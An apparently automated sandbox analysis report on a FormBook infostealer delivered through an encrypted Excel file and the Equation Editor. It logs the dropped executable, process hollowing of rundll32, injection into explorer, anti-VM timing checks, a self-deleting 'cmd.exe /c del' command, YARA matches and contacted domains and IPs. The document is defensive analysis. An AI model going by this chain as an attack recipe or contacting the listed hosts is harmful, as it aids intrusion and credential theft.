      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025163DB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0250905A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F3040
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0251D005
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EE0C6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02592622
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FE6C1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F4680
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025257C3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0257579A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FC7BC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0252D47D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02525485
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02501489
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F351F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0250C5F0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025A3A83
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02517B00
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0257DBDA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EFBD7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0259CBA4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FC85C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0251286D
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0258F8EE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02575955
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_025069FE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0259098E
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F29B2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0250EE4C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02522E2F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0251DF7C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02500F3F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024FCD5B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_02520D3B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0258FDDD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BC75F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A8C5B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A8C60
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A2D87
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A2D90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000A2FB0
      Source: Form BA.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CDF970 appears 48 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00C6DF5C appears 72 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CB373B appears 132 times
      Source: C:\Users\Public\vbc.exeCode function: String function: 00CB3F92 appears 63 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 024EE2A8 appears 38 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0255F970 appears 81 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 02533F92 appears 108 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0253373B appears 238 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 024EDF5C appears 112 times
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: pool[1].exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: vbc.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: pool[1].exe.3.dr, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: vbc.exe.3.dr, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 5.0.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 6.2.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: 6.0.vbc.exe.270000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@10/19@4/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Form BA.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDD82.tmpJump to behavior
      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: Form BA.xlsxVirustotal: Detection: 31%
      Source: Form BA.xlsxReversingLabs: Detection: 30%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: Form BA.xlsxStatic file information: File size 1277440 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: vbc.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: vbc.exe, 00000006.00000002.2243369456.0000000000896000.00000004.00000020.sdmp
      Source: Form BA.xlsxInitial sample: OLE indicators vbamacros = False
      Source: Form BA.xlsxInitial sample: OLE indicators encrypted = True
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0027951F push 72060001h; retf 0016h
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004199C4 push si; iretd
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004151D2 push eax; retf
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00419BB5 push ss; ret
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B3B5 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B46C push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B402 push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041B40B push eax; ret
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004155A9 push ss; iretd
      Source: C:\Users\Public\vbc.exeCode function: 6_2_0041CECD pushad ; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024EDFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B51D2 push eax; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB3B5 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB40B push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB402 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BB46C push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B55A9 push ss; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B99C4 push si; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000B9BB5 push ss; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_000BCECD pushad ; retf
      Source: initial sampleStatic PE information: section name: .text entropy: 7.57808526391
      Source: initial sampleStatic PE information: section name: .text entropy: 7.57808526391
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: Form BA.xlsxStream path 'EncryptedPackage' entropy: 7.99876353791 (max. 8.0)

      Malware Analysis System Evasion:

      barindex
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000A85E4 second address: 00000000000A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000000A897E second address: 00000000000A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004088B0 rdtsc
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2992Thread sleep time: -360000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 1764Thread sleep time: -51703s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 2320Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 51703
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
      Source: explorer.exe, 00000007.00000000.2208966407.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000007.00000000.2194096339.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
      Source: vbc.exeBinary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
      Source: explorer.exe, 00000007.00000000.2194056529.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000007.00000000.2194056529.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
      Source: explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.000
      Source: explorer.exe, 00000007.00000000.2208992815.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeCode function: 6_2_004088B0 rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00409B20 LdrLoadDll,
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C500EA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C50080 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 6_2_00C726F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_024F26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.pon.xyz
      Source: C:\Windows\explorer.exeNetwork Connect: 151.101.0.119 80
      Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
      Source: C:\Windows\explorer.exeDomain query: www.intoxickiss.com
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 1388
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 20000
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000007.00000000.2208966407.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000007.00000000.2209272752.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
